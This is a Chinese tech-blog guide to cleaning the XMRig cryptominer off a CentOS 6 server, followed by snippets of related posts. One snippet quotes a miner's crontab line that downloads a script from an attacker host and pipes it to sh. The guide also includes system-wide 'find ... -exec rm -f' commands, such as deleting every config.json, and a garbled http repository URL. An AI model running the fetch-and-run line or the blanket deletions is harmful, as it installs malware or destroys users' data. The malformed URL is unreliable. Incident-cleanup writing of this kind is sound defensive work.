CentOS 6上彻底删除挖矿软件

已于 2024-11-29 10:25:07 修改
阅读量1.1k 收藏 7
点赞数 9
文章标签: centos linux 运维
于 2024-11-29 09:59:24 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_35308656/article/details/144128744
版权

在CentOS 6上彻底删除挖矿软件XMRig,执行一系列步骤来确保所有相关的文件、配置和进程都被完全移除。以下是一个参考:

1. 检查并终止XMRig进程

首先,你需要找到并终止所有与XMRig相关的进程。

ps aux | grep xmrig

这将列出所有包含xmrig的进程。记下这些进程的PID(进程ID)。

然后使用kill命令终止这些进程:

sudo kill -9 <PID>

或者一次性终止所有XMRig进程:

sudo pkill -9 xmrig

2. 删除XMRig二进制文件和相关文件

查找并删除XMRig的二进制文件和其他相关文件。常见的路径包括/usr/local/bin/usr/bin/opt等。

sudo find / -name "xmrig" -exec rm -f {} \; 注:该命令有误删文件风险,需谨慎

3. 删除XMRig配置文件

查找并删除XMRig的配置文件。常见的配置文件路径包括/etc/xmrig/root/.config/xmrig等。

sudo find / -name "xmrig.conf" -exec rm -f {} \; 注:该命令有误删文件风险,需谨慎
sudo find / -name "config.json" -exec rm -f {} \; 注:该命令有误删文件风险,需谨慎

4. 删除定时任务

检查并删除任何与XMRig相关的定时任务。查看crontab中的条目:

crontab -l

如果发现有与XMRig相关的条目,可以编辑crontab文件并删除这些条目:

crontab -e

5. 检查系统启动项

检查系统启动项,确保没有与XMRig相关的服务或脚本。

查看/etc/init.d/目录下的服务脚本:

ls /etc/init.d/

如果有与XMRig相关的服务脚本,可以删除它们:

sudo rm -f /etc/init.d/xmrig

6. 检查系统日志

检查系统日志以获取更多关于XMRig活动的信息,并确认是否还有残留的活动。

sudo tail -n 100 /var/log/messages
sudo tail -n 100 /var/log/secure

7. 更新系统

确保你的系统是最新的,并安装所有安全更新。

sudo yum update -y

8. 检查并修复系统

使用工具如chkrootkitrkhunter来检查系统是否存在其他恶意软件。

安装并运行chkrootkit

sudo yum install -y chkrootkit
sudo chkrootkit

安装并运行rkhunter

sudo rpm -Uvh http://www Atomicorp.com/installers/atomic
sudo yum install -y rkhunter
sudo rkhunter --update
sudo rkhunter --checkall

9. 更改系统密码

为了安全起见,更改所有用户的密码,特别是root用户和任何具有高权限的用户。

sudo passwd root
sudo passwd <username>

10. 监控系统

持续监控系统,确保没有新的挖矿活动或其他异常行为。可以使用日志分析工具如logwatch来定期发送系统日志报告。

Drl2024
关注
彻底清除SSHD挖矿病毒_清除定时下载启动病毒程序_centos7安全防护_CPU占用率超过百分之300_centos7.4中毒CPU百分之百_清理毒源---Linux工作笔记068
添柴程序猿的专栏
12-11 861
sshd占用cpu百分之300多...而且就算是kill -9 杀掉进程以后,进程又会自动启动。我们执行这个命令,可以看到有个/var/tmp/sshd的文件。rm -rf sshd删除这个文件,然后我们再去top可以看到。我们进入cd /var/tmp。
阿里云服务器使用教程:CentOS 7服务器基本安全策略设置详细教程
蓝多多的小仓库
03-28 868
挖矿病毒的最大特点就是挖矿脚本执行后会自我删除,然后通过另一个脚本和定时任务去下载挖矿脚本,因此挖矿脚本并不存在与服务器。(b)使用su root切换到root用户,并同时使用/sbin/service来操作,如/sbin/service sshd restart.su或者su root 只是相当于以root用户身份来操作,实际的系统环境并没有切换到root用户的环境,而只是当前登录用户。将被注释掉的Port 22前的注释符号“#”去掉,并将22改为您想要设置的端口,:wq保存退出。
libgcc-a挖矿木马清除脚本
05-19
用于清楚Xmrig木马变种libgcc_a
个人总结之xmrig 挖矿自动化程序如何彻底删除Linux问题】
m0_51125809的博客
12-25 1795
正在被挖矿程序占用所有CPU等资源,导致本身业务无内存可用。
xmrig挖矿病毒解决办法
最新发布
zqh15730733676的博客
02-21 467
1、找到xmrig文件,删除里面的挖矿脚本,然后执行chattr +i /path/to/folder ,杀死进程。如果linux服务器上发现了xmrig挖矿病毒,删掉文件,杀死进程之后又出现了,怎么都解决不了可以试试以下方法。
服务器被挖矿了怎么办,实战清退
qq_14926283的博客
03-25 2660
然后看看有没有定时任务,有的时候它会定时去检测xmrig挖矿木马是否在正常运行,不正常它会重新去做一系列的处理,重新植入木马,这时候我们要去取消这些定时任务。注意这些看起来像系统进程的最好不要kill掉,容易出现意外,把生产环境的服务给干费了,那我们得去删掉这个后门用户怎么办。可以看到我这边有一个名为xmrig(有经验的这里看到名字直接就能判断)的进程霸占了100.3的资源,这里中招了。第一时间重启服务是不行的,这些挖矿木马一定是会伴随着你的重启而自动重启,一定时间内重新霸占你的服务器资源。
Linux挖矿程序清除
延成的博客
09-01 1548
【代码】Linux挖矿程序清除。
Debian 中招挖矿病毒发现及清理记录,唉~
边学边用
10-01 599
2.安装 net-tools 工具包,使用 netstat-antlp | grep -e bash -e rsync 可以看到 -bash 有网络通讯,查了一下对面地址是外国的,XXX 的。4.清理完成,此时再观察一会儿发现挖矿的 -bash 再没有重新启动,CPU 和 内存 占用恢复正常,此时就可以删掉挖矿程序与计划任务了。,因为另外两个带有 pts/0 和 pts/1 说明这两个是我正常连接的 ssh 端的正常 -bash ,这两个要是干掉,那连接也就断了。3.干掉 -bash 的进程,
阿里云Centos 解决挖矿程序:kdevtmpfsi--服务器CPU占用高、内存占用高
暮歌半生情朽的博客
09-17 906
前言 互联网存在很多的漏洞,如果我们使用不当,就会别被别人利用或者是盗取信息。之前在阿里云买的服务器,自己配置了nginx,mysql,redis等服务。由于在某些时候,本地程序开发中需要使用这些服务,便开放了相关的接口包括redis 的6379端口。通过查阅资料,病毒经常利用redis的6379端口被注入。 中毒具体描述 某一天,我写完本地程序,准备部署到云服务器,然而我的xshell始终是连接不上服务器,或者是连接上反应非常慢,我怀疑阿里云对我的服务器动了什么了(实在是对不住,毕竟我也不知道还有这种事情
xmrig挖矿病毒彻底清除
热门推荐
mynameisjinxiaokai的博客
04-20 1万+
1、通过top命令查看进程发现,占用CPU最大的进程是一个叫xmrig的进程。3、最后一定要修改机器密码,不然过几天还会存在。2、找到xmrig所在的文件并删除。记录下进程的PID,然后杀死进程。
如何彻底清除xmrig-6.22.0挖矿病毒
01-07
### 彻底清除 xmrig-6.22.0 挖矿恶意软件安全移除教程 #### 终止 XMRig 进程 为了确保系统的安全性,在开始...综上所述,以上就是关于如何彻底清除 CentOS 上名为 xmrig-6.22.0 版本挖矿病毒的一套完整的解决方案。
消灭Linux挖矿病毒rumpostgreswk
BIG BOSS的博客
09-09 3574
病毒定时任务 sudo crontab -u postgres -l [root@master ~]# sudo crontab -u postgres -l */30 * * * * /home/postgres//home/postgres/data/./oka * */6 * * * wget -q -O- http://xmr.linux1213.ru:2019/back.sh | sh 删除 sudo crontab -u postgres -r
confluence挖矿病毒(kdevtmpfsi 、solrd)解决
lin351550660的专栏
01-12 3734
自己安装了conference,没用1周。发现服务器内存被吃完了。 定位问题: 1、之前就听说过confluence 有漏洞 攻击者会利用confluence编辑页面的某个参数进行写入攻击。所以直接在百度搜索:confluence挖矿病毒 2、感谢https://www.cnblogs.com/hack404/p/11464890.html作者的帮助。 处理过程: 1. 先封掉外网HTTP 端口 使用腾讯云控制台 安全组 设置80端口不允许访问。 2. 查杀进程 使用命令:top 查..
如何检查Centos是否存在挖矿程序
u010216616的专栏
07-17 1859
4. 使用专业工具:如果想更加深入地检查 Centos 系统中的挖矿程序,可以使用一些专业工具,例如"hashwatch"和"hping3"。这些工具可以检测网络上的主机是否存在挖矿行为,并跟踪挖矿程序的活动。例如,可以使用"top"命令来查看系统中正在运行的进程,查找是否有可疑的进程。例如,可以在/etc/目录下查找任何可能与挖矿程序相关的配置文件,或者在其他系统目录中查找任何奇怪的脚本或二进制文件。但是,这种方法只能检测到直接连接到挖矿芯片的程序,而无法检测到使用代理或隐藏进程的挖矿程序。
根除矿机病毒xmrig
qq_19582693的博客
07-28 5020
根除xmrig矿机病毒
Linux挖矿程序的查杀
kula的博客
11-29 651
挖矿程序查杀
解决centos被minerd挖矿程序入侵方法
weixin_30781775的博客
10-25 465
记录一次服务器被入侵的解决方法 一:问题说明1、我的服务器是使用的阿里云的CentOS,收到的阿里云发来的提示邮件如下 然后我查看了运行的进程情况(top命令),看到一个名为minerd的进程占用了99.5%的CPU2、minerd是个挖矿程序,什么是“挖矿”,特此百度了一下, 所谓“挖矿”实质上是用计算机解决一项复杂的数学问题,来保证比特币网络分布式记账系统的一致性。比特币网络会...
Xmrig挖矿木马排查过程,xmrig占用大量CPU
cf
12-10 4779
4.查找find / -name xmrig 文件,或者程序信息 ps -aux | grep xmrig,找到安装目录并将其删除 rm -rf /root/5.删除定时任务 rm -rf /var/spool/cron。6.删除ssh认证信息 rm -rf ./ssh/8.尽量使用内网链接,不要暴露端口号或者外网地址。1.通过top发现xmrig占用了大量cpu。3.尝试直接kill发现杀死之后又会自动重启。7.原因,有可能是redis等程序导致,2.通过网上搜索发现是挖矿木马。
最新挖矿病毒xmrig清除方法和原理
m0_73140589的博客
03-21 6415
手机端接收短信提醒,服务器正遭受挖矿病毒攻击,服务器的cpu和内存占用高,阿里云不断告警
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值